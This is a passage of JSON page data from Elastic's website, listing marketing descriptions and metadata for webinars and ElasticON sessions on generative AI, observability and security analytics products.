EST\u003c/p\u003e\u003cp\u003eEMEA: 11:00 a.m. CET, 3:30 p.m. IST\u003c/p\u003e\u003cp\u003eAPJ: 11:00 a.m. SGT, 2:00 p.m. AEDT\u003c/p\u003e"},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eAs the landscape of artificial intelligence continues to evolve at an unprecedented pace, 2025 is poised to be the year where choices redefine the future of technology.\u003c/p\u003e\u003cp\u003eOur upcoming virtual event delves into the emerging technical trends in search and highlights the transformative potential of generative AI (GenAI) as ideas move from experimentation to production. Join industry leaders, AI pioneers, and technical experts as we explore the critical decisions that will shape the deployment of GenAI in the coming year.\u003c/p\u003e\u003cp\u003eThis event is designed for technical leaders, data scientists, AI practitioners, and developers who are keen on understanding the pivotal trends and choices that will drive GenAI in 2025. Learn how to stay ahead of the curve by successfully bringing GenAI solutions into production, heralding a new era of technological innovation and operational excellence.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eChoice of AI Providers:\u003c/strong\u003e Examine the expanding ecosystem of GenAI technology, comparing offerings from various providers. Understand the implications of choosing the right model based on factors such as performance, cost, and ethical considerations.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eWorkflow Customization:\u003c/strong\u003e Discover innovative tools and frameworks that enable streamlined creation and deployment of AI workflows like retrieval augmented generation (RAG). Learn how to meet specific business needs with tailored solutions that ensure scalability and efficiency.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eIntegrations:\u003c/strong\u003e Identify best practices for integrating GenAI into existing systems and workflows. Explore strategies to ensure compatibility and seamless operation across environments.\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eFuture-Proofing AI Investments:\u003c/strong\u003e Learn how to make strategic decisions that safeguard your AI investments against rapid technological changes and market shifts.\u003c/li\u003e\u003c/ul\u003e\u003ch4\u003eAdditional resources\u003c/h4\u003e\u003cul\u003e\u003cli\u003eLooking for more general GenAI trends? Check out the \u003ca href=\"/resources/search/analyst-report/idc-how-advances-ai-changed-game\"\u003elatest research from IDC\u003c/a\u003e on how search has advanced in the era of AI.\u003c/li\u003e\u003cli\u003eExplore the \u003ca href=\"/partners/ai-ecosystem\"\u003eElastic AI Ecosystem,\u003c/a\u003e which offers developers prebuilt Elasticsearch vector database \u003ca href=\"https://www.elastic.co/search-labs/integrations\"\u003eintegrations\u003c/a\u003e from a trusted network of industry-leading AI companies.\u003c/li\u003e\u003c/ul\u003e","presentation_date":"2025-02-27T17:00:00.000Z","presenter":["blt22c162f71dbc7943","blt6cc24a383769a34f","blt96df47be2dea5b85","blt9d00569d44cf03ea"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"2025 technical trends: Embracing the era of choice to bring GenAI into production","seo_description_l10n":"As organizations bring their GenAI experiences from experimentation to production, 2025 is poised to be the year where choices redefine the future of technology. ","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"2025 technical trends: Embracing the era of choice to bring GenAI into production","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-10T22:01:34.001Z","updated_by":"blt3044324473ef223b70bc674c","url":"/virtual-events/2025-technical-search-trends-live","video_type":["blt321a8ac0bef65269"],"vidyard":{"uuid":"","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-10T22:01:39.738Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltfda738f49667aa8d","_version":5,"locale":"en-us","ACL":{},"created_at":"2024-10-22T21:36:30.405Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Maximize your investment: Streamline cloud detection and response with Elastic Security ","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"12485","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":["bltd8d585d4734a50f6"],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":"default"},"paragraph_l10n":"\u003cp\u003eCloud adoption is accelerating, and with it comes the increased complexity of securing multi-cloud environments. Security teams face challenges such as tool fragmentation, lack of unified context, and rising cloud-based threats, which hinder their ability to effectively respond to incidents.\u003c/p\u003e\n\u003cp\u003eJoin our experts as they explore how Elastic's cloud detection and response (CDR) capabilities address these challenges by providing unified visibility, intuitive threat analysis, and seamless data integration. Learn how to empower your team to navigate cloud security complexities and secure your environment efficiently.\u003c/p\u003e\n\u003ch4\u003eTakeaways\u003c/h4\u003e\n\u003cul class=\"list-green\"\u003e\n \u003cli\u003eUnderstand how Elastic Security’s integrated approach simplifies cloud security, eliminating the need for standalone CDR tools.\u003c/li\u003e\n \u003cli\u003eLearn about the latest enhancements, including agentless ingestion, cloud-native anomaly detection, and graph-based visualizations.\u003c/li\u003e\n \u003cli\u003eDiscover how Elastic's AI-driven analytics improve threat correlation, reduce operational costs, and streamline cloud threat detection and response.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eAdditional resources\u003c/h4\u003e\n\u003cul class=\"list-green\"\u003e\n \u003cli\u003e\u003ca href=\"/videos/how-to-modernize-your-cloud-security-operations-with-elastic-in-120-seconds\"\u003eModernize your cloud security operations with Elastic — Explained in 120 seconds\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"/virtual-events/tips-and-tricks-for-securing-cloud-workloads\"\u003eTips and tricks about securing cloud workloads\u003c/a\u003e\u003c/li\u003e\n \u003cli\u003e\u003ca href=\"/security/cloud-security\"\u003eElastic Security for Cloud\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e","presentation_date":"2024-12-18T16:00:00.000Z","presenter":["blt65b0d48a762d02b4","blt0b3b04f529a7fbd3"],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"Streamline cloud detection and response with Elastic Security","seo_description_l10n":"Discover how Elastic's cloud detection and response (CDR) capabilities simplify multi-cloud security. Join our experts to learn about unified visibility, intuitive threat analysis, and seamless data integration. Empower your team in navigating cloud security complexities efficiently – today.","seo_keywords_l10n":"","seo_image":null,"noindex":false},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"title":"Webinars","label_l10n":"Webinars","keyword":"webinar","hidden_value":false,"tags":[],"locale":"en-us","uid":"blt7449a6fa428f966d","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2020-06-17T03:42:00.222Z","updated_at":"2022-08-25T18:09:24.790Z","ACL":{},"_version":10,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-26T01:40:17.963Z","user":"bltf020187e3918e5de"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[],"tags_region":[{"_version":4,"locale":"en-us","uid":"blt800f3049a517c000","ACL":{},"created_at":"2021-04-13T17:51:50.053Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"north-america","label_l10n":"North America","tags":[],"title":"North America","updated_at":"2024-04-17T07:38:48.383Z","updated_by":"blt3e52848e0cb3c394","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:47:41.929Z","user":"blt3044324473ef223b70bc674c"}},{"_version":1,"locale":"en-us","uid":"bltf4c15a435ded5722","ACL":{},"created_at":"2021-04-13T17:54:31.202Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"europe","label_l10n":"Europe","tags":[],"title":"Europe","updated_at":"2021-04-13T17:54:31.202Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2022-08-10T12:13:00.412Z","user":"blt3e52848e0cb3c394"}},{"_version":1,"locale":"en-us","uid":"bltdabf9ea82c489dad","ACL":{},"created_at":"2023-06-27T17:09:23.025Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"india","label_l10n":"India","tags":[],"title":"India","updated_at":"2023-06-27T17:09:23.025Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-06-27T17:09:25.693Z","user":"blt36e890d06c5ec32c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"Maximize your investment: Streamline cloud detection and response with Elastic Security","token":"9676274626","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2025-01-06T16:58:27.524Z","updated_by":"blt417fc94cb7c64d7d","url":"/virtual-events/streamline-cloud-detection-and-response","video_type":["bltdcadaef5bdccac7e"],"vidyard":{"uuid":"XWbNr7wYaKUaAWAJb6KsoF","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-06T16:58:31.827Z","user":"blt417fc94cb7c64d7d","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltca6041fb35c4ca5d","_version":2,"locale":"en-us","ACL":{},"created_at":"2024-12-23T20:09:33.354Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Get smarter and faster problem resolution with AI\u0026#8209;powered observability","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eAt ElasticON New York City, we showed you the future of \u003ca href=\"/observability\" target=\"_self\"\u003eObservability\u003c/a\u003e, where identifying problems before customers do is the norm.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cp\u003eDiscover how ingesting logs, metrics, traces, profiling, and business data, combined with analytics and our AI Assistant enables interactive and contextual observability. Hear firsthand from customers who have harnessed Elastic to achieve comprehensive visibility and accelerate problem resolution. We'll also demonstrate how Elastic’s capabilities, powered by Search AI and an OpenTelemetry (OTel) first approach, expedite issue detection and remediation, empowering SREs to deliver operational excellence.\u003c/p\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2024-11-13T17:01:00.000Z","presenter":[],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - Get smarter and faster problem resolution with AI-powered observability","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-23T20:18:47.717Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/observability-problem-resolution","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"enZQWk56ofpTkaxqtXFWC2","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-02T18:19:06.638Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb8150b28f02c74e4","_version":3,"locale":"en-us","ACL":{},"created_at":"2024-12-23T20:06:42.336Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Get ahead of attacks with AI\u0026#8209;driven security analytics","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eAt ElasticON New York City, we showed you how \u003ca href=\"/security\" target=\"_self\"\u003eElastic Security\u003c/a\u003e helps you proactively fight attacks smarter with AI-driven security analytics that will make triaging alerts, integrating custom data and investigations much simpler.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cp\u003eHear from select customers about how Elastic Security has helped their organization fight smarter. You'll also see a demo and hear real-world examples of how generative AI features built on the Elastic Search AI Platform empower security analysts to detect faster and remediate sooner.\u003c/p\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2024-11-13T16:00:00.000Z","presenter":[],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - Get ahead of attacks with AI-driven security analytics","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-23T20:18:18.631Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/ai-security-analytics","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"hNzNhrGrJoPzEs4g8St4pA","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-02T18:19:06.845Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt8d15d232d59e9bfd","_version":4,"locale":"en-us","ACL":{},"created_at":"2024-12-23T20:05:09.346Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":"Unlock new opportunities in your data with the Elastic Search AI Platform","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","cta_title_l10n":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eAt ElasticON New York City, we showed you how our latest platform innovations make it easier than ever to build and scale Elastic solutions.\u003c/p\u003e\u003ch4\u003eHighlights\u003c/h4\u003e\u003cp\u003eSee how Elastic Cloud Serverless offers hassle-free operations with near instant configuration, guided onboarding, and AutoOps capabilities for better performance. Learn how Search AI Lake delivers low latency querying across all data without compromising scalability. Discover how to simplify analysis with ES|QL, and hear about our roadmap for upcoming inference and AI capabilities.\u003c/p\u003e\u003ch4\u003eWant to stay in the loop on all things Elastic?\u003c/h4\u003e\u003cp\u003e\u003ca href=\"/events?tab=1\" target=\"_self\"\u003eJoin us\u003c/a\u003e at our upcoming events or check out \u003ca href=\"/events/elasticon/archive\" target=\"_self\"\u003eElasticON's video archive\u003c/a\u003e.\u003c/p\u003e\u003cp\u003e\u003ca href=\"/community\" target=\"_self\"\u003eGet connected\u003c/a\u003e to find help from the Elastic community.\u003c/p\u003e","presentation_date":"2024-11-13T16:00:00.000Z","presenter":[],"sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_keywords_l10n":"","seo_image":null,"noindex":true},"tags":[],"tags_elastic_stack":[],"tags_event_type":[{"_version":3,"locale":"en-us","uid":"blt1671c05cb4d5e1af","ACL":{},"created_at":"2020-06-17T03:41:39.784Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elasticon","label_l10n":"ElasticON","tags":[],"title":"ElasticON","updated_at":"2021-03-04T18:54:01.311Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-01-25T09:15:42.772Z","user":"blt3e52848e0cb3c394"}}],"tags_event_type_delivery":[],"tags_industry":[],"tags_language":[{"_version":7,"locale":"en-us","uid":"blt01715789a7031adc","ACL":{},"created_at":"2019-10-23T21:42:58.467Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"english","label_l10n":"English","tags":[],"title":"English","updated_at":"2020-12-02T19:17:31.532Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:44:09.411Z","user":"blt3044324473ef223b70bc674c"}}],"tags_region":[{"uid":"bltccf54d4afac13158","ACL":{},"_version":1,"created_at":"2020-11-13T00:06:52.343Z","created_by":"blt3044324473ef223b70bc674c","keyword":"americas","label_l10n":"Americas","locale":"en-us","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2020-12-24T13:12:41.684Z","user":"blt3e52848e0cb3c394"},"tags":[],"title":"Americas","updated_at":"2020-11-13T00:06:52.343Z","updated_by":"blt3044324473ef223b70bc674c"},{"_version":1,"locale":"en-us","uid":"blt0c39553861919e12","ACL":{},"created_at":"2020-11-13T00:08:13.750Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"emea","label_l10n":"EMEA","tags":[],"title":"EMEA","updated_at":"2020-11-13T00:08:13.750Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:45:29.115Z","user":"blt3044324473ef223b70bc674c"}},{"_version":8,"locale":"en-us","uid":"blt25a1df5963785e04","ACL":{},"created_at":"2022-09-07T08:10:02.602Z","created_by":"blt3e52848e0cb3c394","hidden_value":false,"keyword":"apac","label_l10n":"Asia/Pacific","tags":[],"title":"Asia/Pacific","updated_at":"2024-04-16T19:59:05.617Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-08-06T18:46:36.098Z","user":"blt3044324473ef223b70bc674c"}}],"tags_role":[],"tags_stage":[],"tags_technical_level":[],"tags_topic":[],"tags_use_case":[],"timezone":{"title_l10n":"","url":""},"title":"ElasticON 2024/2025 - Unlock new opportunities in your data with the Elastic Search AI Platform","token":"","translated_date_l10n":"","translated_time_l10n":"","updated_at":"2024-12-23T20:08:05.475Z","updated_by":"blt3044324473ef223b70bc674c","url":"/events/elasticon/archive/unlock-data-opportunities","video_type":["blt0d07966d0c7cc2b8"],"vidyard":{"uuid":"MEPBNwPuGeN4caEoz3Vgns","video_has_playlist":false,"data_chapter":""},"zoom_id":"","publish_details":{"time":"2025-01-02T18:19:06.859Z","user":"blt3044324473ef223b70bc674c","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt5e99c7d66197b3f6","_version":3,"locale":"en-us","ACL":{},"created_at":"2023-01-24T20:27:10.732Z","created_by":"blt3044324473ef223b70bc674c","disclaimer":[],"do_not_display_on_overview_page":false,"email_merchandising":{"email_merchandising_placement_number":null,"description":""},"hour_time_format":false,"image":null,"main_header":{"topic_heading_l10n":"","title_l10n":" A day in the life of a security analyst","paragraph_l10n":"","cta_list":{"cta_type":null,"cta_title_l10n":"","url":""}},"marketo":{"title_l10n":"","subtitle_l10n":"","marketo_load_id":"","success_message_l10n":"","fallback":"","gdpr_text":[],"gdpr_load_id":"","cta_title_l10n":""},"message_for_attendee":"","note":{"paragraph_l10n":""},"override_hosted_by_copy_l10n":"","page_layout":{"page_layout":null},"paragraph_l10n":"\u003cp\u003eSee Elastic Security through an analyst’s eyes in this fast-paced video. Security expert James Spiteri shows how the SOC uses a SIEM solution to triage alerts, investigate an advancing attack, and stop a threat before damage is done.\u003c/p\u003e\n\u003cp\u003eThis demo reveals key security operations workflows that support continuous monitoring, investigation and incident response, threat hunting, and other critical use cases. It showcases key features, including:\u003c/p\u003e\n\u003cul\u003e\n \u003cli\u003eSecurity dashboards and visualizations\u003c/li\u003e\n \u003cli\u003eMITRE ATT\u0026amp;CK-aligned ML jobs and detection rules\u003c/li\u003e\n \u003cli\u003eEmbedded threat intelligence, insights, and other context\u003c/li\u003e\n \u003cli\u003eHunting and investigation timeline UI\u003c/li\u003e\n \u003cli\u003eAutonomous response actions\u003c/li\u003e\n \u003cli\u003eExternal workflow integrations\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eAdditional 